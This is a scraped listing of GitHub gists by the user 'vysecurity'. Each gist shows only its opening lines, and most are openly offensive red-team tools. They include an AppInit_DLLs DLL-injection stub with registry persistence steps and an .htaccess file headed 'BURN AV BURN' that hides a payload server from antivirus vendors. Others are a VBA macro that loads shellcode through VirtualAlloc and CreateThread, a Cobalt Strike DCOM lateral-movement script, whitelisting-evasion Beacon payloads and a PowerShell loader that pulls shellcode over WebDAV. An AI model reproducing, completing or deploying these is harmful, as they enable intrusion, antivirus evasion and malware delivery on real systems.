vysecurity
/ appinitdllinjection.c
Created
September 11, 2017 14:19
— forked from Arno0x/appinitdllinjection.c
AppInit_DLLs injection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with: cl.exe appinitdllinjection.c /LD /o appinitdllinjection.dll | |
| // | |
| // This DLL can only be injected in a x64 process | |
| // | |
| // Set the registry to automatically load this DLL into 'any' process that is started (at least the ones relying on User32.dll) | |
| // by using the AppInit_DLLs capability: | |
| // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = 'path_to_the_dll' (comma separated if required) | |
| // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs = 1 (to enable this mecanism) | |
| #include <windows.h> |
vysecurity
/ apacherules
Created
September 24, 2017 17:43
— forked from curi0usJack/.htaccess
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # TrendMicro | |
| RewriteCond expr "-R '150.70.0.0/22'" [OR] | |
| RewriteCond expr "-R '150.70.104.0/22'" [OR] | |
| RewriteCond expr "-R '150.70.110.0/24'" [OR] | |
| RewriteCond expr "-R '150.70.112.0/20'" [OR] |
vysecurity
/ Akamai
Last active
October 26, 2022 08:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aa.com | |
| abcdin.cl | |
| abi.ib | |
| a.ccdn.es | |
| activisionblizzard.com | |
| adlibris.com | |
| admin.bigbasket.com | |
| admin.brightcove.co.jp | |
| admin.brightcove.com | |
| admin.charmingshoppes.com |
vysecurity
/ attack-to-csv.py
Last active
April 28, 2022 21:44
Get MITRE ATT&CK Framework Techniques by Group in CSV
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from stix2 import FileSystemSource | |
| from stix2 import Filter | |
| from stix2.utils import get_type_from_id | |
| fs = FileSystemSource('./enterprise-attack') | |
| def get_group_by_alias(src): | |
| return src.query([ | |
| Filter('type', '=', 'intrusion-set'), | |
| ]) |
vysecurity
/ macro_evade_av.vba
Created
September 11, 2017 14:19
— forked from Arno0x/macro_evade_av.vba
Load shellcode in macro, from bibliography souce
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #If VBA7 Then | |
| Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr | |
| Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr | |
| Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr | |
| #Else | |
| Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long | |
| Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long | |
| Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long | |
| #End If |
vysecurity
/ dcom_shellexecute.cna
Created
May 31, 2018 02:45
— forked from 001SPARTaN/dcom_shellexecute.cna
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Lateral movement techniques based on research by enigma0x3 (Matt Nelson) | |
| # https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
| # https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ | |
| # Beacon implementation based on comexec.cna by Raphael Mudge | |
| # https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2 | |
| # Register alias | |
| beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", | |
| "Usage: dcom_shellexecute [target] [listener]\n\n" . | |
| "Spawn new Beacon on a target via DCOM ShellExecute Object."); |
vysecurity
/ beaconPayload.cs
Created
January 28, 2016 13:41
Application Whitelisting Evasion for Cobalt Strike - Beacon Payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; |
vysecurity
/ Invoke-WebDavDelivery.ps1
Created
September 11, 2017 14:19
Payload delivery using WebDAV PROPFIND only covert channel
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WebDavDelivery | |
| { | |
| <# | |
| .SYNOPSIS | |
| Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it. | |
| This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data. | |
| Function: Invoke-WebDavDelivery | |
| Author: Arno0x0x, Twitter: @Arno0x0x |
vysecurity
/ service.cs
Created
September 11, 2017 14:19
— forked from Arno0x/service.cs
A basic Windows service written in .Net/c#
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Creates a basic Windows Service using .Net framework. | |
| Compile: | |
| c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs | |
| Create the service with name "Service": | |
| sc create Service type=own binpath= c:\Path\To\service.exe | |
| Start the service: |
NewerOlder